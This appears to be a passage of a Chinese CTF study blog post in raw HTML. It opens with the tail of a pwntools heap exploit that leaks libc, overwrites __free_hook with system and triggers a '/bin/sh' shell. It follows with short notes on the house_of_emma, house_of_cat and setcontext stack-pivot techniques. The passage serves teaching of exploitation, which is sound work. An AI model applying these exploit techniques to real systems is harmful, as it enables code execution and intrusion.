class="line">p.recvuntil(&quot;]: &quot;)</span><br><span class="line">leak_addr &#x3D; u64(p.recv(6).ljust(8,b&#39;\x00&#39;)) </span><br><span class="line">print(hex(leak_addr))</span><br><span class="line">#计算libc偏移</span><br><span class="line">malloc_hook &#x3D; leak_addr -88 -0x10</span><br><span class="line">libc_base &#x3D; malloc_hook - libc.sym[&#39;__malloc_hook&#39;]</span><br><span class="line">free_hook &#x3D; libc_base + libc.sym[&#39;__free_hook&#39;]</span><br><span class="line">system_addr &#x3D; libc_base + libc.sym[&#39;system&#39;] + 0xff0</span><br><span class="line">print(hex(system_addr))</span><br><span class="line"></span><br><span class="line">#修改free_hook为system</span><br><span class="line">payload &#x3D; p64(0)*3 + p64(0x13377331)</span><br><span class="line">payload +&#x3D; p64(free_hook) + p64(0x100)</span><br><span class="line">#这里的地址为0x13370840 &#x3D; 0x13370800+0x40</span><br><span class="line">#因为我们虽然有了system但却没有bin&#x2F;sh参数，那么我们需要利用free的特性传参</span><br><span class="line">#我们利用free堆块一，此时执行的是free(*(chunk_1_addr))</span><br><span class="line">#如果我们将chunk_1的内容写成bin&#x2F;sh</span><br><span class="line">#那么我们最后得到的是free(&#x2F;bin&#x2F;sh\x00)</span><br><span class="line">payload +&#x3D; p64(0x13370840) + p64(8)</span><br><span class="line">payload +&#x3D; b&#39;&#x2F;bin&#x2F;sh\x00&#39;</span><br><span class="line">edit(0, payload) </span><br><span class="line">edit(0,p64(system_addr))</span><br><span class="line"></span><br><span class="line">gdb.attach(p)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>



<h2 id="house-of-emma"><a href="#house-of-emma" class="headerlink" title="house_of_emma"></a>house_of_emma</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">此漏洞的使用前提需要有两大条件：</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line">1.可以任意写一个可控地址（LargeBin Attack、Tcache Stashing Unlink Attack...）</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line">2.可以触发 IO 流（FSOP、House OF Kiwi）</span><br></pre></td></tr></table></figure>



<h2 id="house-of-cat"><a href="#house-of-cat" class="headerlink" title="house_of_cat"></a>house_of_cat</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">目前适用于任何版本（包括glibc2.35）</span><br><span class="line">House of emma是glibc2.34下常用的攻击手法之一，其利用条件只需任意写一个可控地址就可以控制程序执行流，攻击威力十分强大。但是需要攻击位于TLS的_pointer_chk_guard，并且远程可能需要爆破TLS偏移。</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line">House of Cat利用了House of emma的虚表偏移修改思想，通过修改虚表指针的偏移，避免了对需要绕过TLS上 _pointer_chk_guard的检测相关的IO函数的调用，转而调用_IO_wfile_jumps中的_IO_wfile_seekoff函数，然后进入到_IO_switch_to_wget_mode函数中来攻击，从而使得攻击条件和利用变得更为简单。并且house of cat在FSOP的情况下也是可行的，只需修改虚表指针的偏移来调用_IO_wfile_seekoff即可（通常是结合__malloc_assert，改vtable为_IO_wfile_jumps+0x10）。</span><br></pre></td></tr></table></figure>

<h1 id="rctf-2019-babyheap"><a href="#rctf-2019-babyheap" class="headerlink" title="rctf_2019_babyheap"></a>rctf_2019_babyheap</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">setcontext</span><br><span class="line">我们先来看下setcontext代码中的内容，如下截图所示，一般我们将free_hook或者malloc_hook地址的内容替换为setcontext+53，也就是mov rsp, [rdi+0xa0]这行代码，之后调用钩子函数的时候就会从这行代码开始执行。从这行代码往后，我们可以看到汇编代码修改了很多寄存器的值，因此使用setcontext可以方便的设置环境上下文。	</span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/20210627185630879.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0E5NTE4NjA1NTU=,size_16,color_FFFFFF,t_70#pic_center" alt="setcontext"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">这里我们着重关注一下修改rsp和rcx寄存器的两行代码，mov rsp, [rdi+0xa0]和mov rcx, [rdi+0xa8]。修改rsp的值将会改变栈指针，因此我们就获得了控制栈的能力，修改rcx的值后接着有个push操作将rcx压栈，然后汇编指令按照顺序会执行截图中最后的retn操作，而retn的地址就是压入栈的rcx值，因此修改rcx就获得了控制程序流程的能力。</span><br><span class="line">  这里我们可以发现setcontext可以改变栈空间，改变程序流程，因此在遇到沙箱机制的题目需要调用ROP链时，使用setcontext就非常方便，下面将介绍具体操作。</span><br></pre></td></tr></table></figure>

</div><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">墨水彩笔</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="http://example.com/2022/08/11/%E5%AD%A6%E4%B9%A0%E7%AF%87/">http://example.com/2022/08/11/%E5%AD%A6%E4%B9%A0%E7%AF%87/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="tag_share"><div class="post-meta__tag-list"></div><div class="post_share"><div class="social-share" data-image="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2022/08/27/%E8%BF%91%E6%9C%9F%E6%AF%94%E8%B5%9B%E5%AF%86%E7%A0%81%E5%AD%A6%E5%A4%8D%E7%8E%B0/"><img class="prev-cover" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">Previous Post</div><div class="prev_info">近期比赛密码学复现</div></div></a></div><div class="next-post pull-right"><a href="/2022/08/11/2022%E5%BC%BA%E7%BD%91%E6%9D%AF/"><img class="next-cover" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">Next Post</div><div class="next_info">2022强网杯</div></div></a></div></nav></article></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2023 By 墨水彩笔</div><div class="framework-info"><span>Framework </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>Theme </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><section id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="Read Mode"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="Switch Between Light And Dark Mode"><i class="fas fa-adjust"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="Setting"><i class="fas fa-cog"></i></button><button class="close" id="mobile-toc-button" type="button" title="Table Of Contents"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="Back To Top"><i class="fas fa-arrow-up"></i></button></div></section><div><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><div class="js-pjax"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></div></body></html>